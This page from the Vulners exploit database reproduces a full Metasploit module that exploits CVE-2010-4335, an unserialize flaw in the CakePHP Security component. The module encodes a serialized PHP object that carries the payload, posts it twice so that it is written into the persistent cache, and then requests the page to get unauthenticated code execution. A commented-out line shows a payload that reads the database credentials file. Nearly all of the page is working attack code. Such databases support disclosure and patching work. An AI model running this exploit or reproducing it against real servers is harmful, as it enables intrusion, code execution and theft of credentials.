Vulners
Lucene search
CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
##
# $Id: cakephp_cache_corruption.rb 11579 2011-01-14 16:25:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit',
'Description' => %q{
CakePHP is a popular PHP framework for building web applications.
The Security component of CakePHP is vulnerable to an unserialize attack which
could be abused to allow unauthenticated attackers to execute arbitrary
code with the permissions of the webserver.
},
'Author' =>
[
'tdz',
'Felix Wilhelm', # poc
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11579 $',
'References' =>
[
[ 'OSVDB', '69352' ],
[ 'CVE', '2010-4335' ],
[ 'BID', '44852' ],
[ 'URL', 'http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 4000,
# max url length for some old versions of apache according to
# http://www.boutell.com/newfaq/misc/urllength.html
'DisableNops' => true,
#'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
'Compat' =>
{
'ConnectionType' => 'find',
},
'Keys' => ['php'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 15 2010'
))
register_options(
[
OptString.new('URI', [ true, "CakePHP POST path", '/']),
OptString.new('OptionalPostData', [ false, "Optional POST data", '']),
], self.class)
end
def exploit
#path = rand_text_alphanumeric(rand(5)+5)
key = rand_text_alphanumeric(rand(5)+5)
fields = rand_text_alphanumeric(rand(5)+5)
#payload = "readfile('../config/database.php'); exit();"
len=payload.encoded.length + 6
p = ""
p << ':O:3:"App":4:{s:7:"__cache";s:3:"bam";s:5:"__map";a:2:{s:4'
p << ':"Core";a:1:{s:6:"Router";s:42:"../tmp/cache/persistent/cake_core_file_map";}'
p << 's:3:"Foo";s:'
p << len.to_s()
p << ':"<? '
p << payload.encoded
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
#rot13 and urlencode
p = p.tr("A-Ma-mN-Zn-z","N-Zn-zA-Ma-m")
p = CGI.escape(p)
data = "data%5b_Token%5d%5bkey%5d="
data << key
data << "&data%5b_Token%5d%5bfields%5d="
data << fields
data << p
data << "&_method=POST"
#some apps need the form post data
if datastore['OptionalPostData']
postdata = CGI.escape(datastore['OptionalPostData'])
data << "&"
data << postdata
end
print_status("Sending exploit request 1")
res = send_request_cgi(
{
'uri' => datastore['URI'],
'method' => "POST",
'ctype' => 'application/x-www-form-urlencoded',
'data' => data
}, 5)
print_status("Sending exploit request 2")
res = send_request_cgi(
{
'uri' => datastore['URI'],
'method' => "POST",
'ctype' => 'application/x-www-form-urlencoded',
'data' => data
},5)
print_status("Requesting our payload")
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
'uri' => datastore['URI']
}, 5)
handler
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1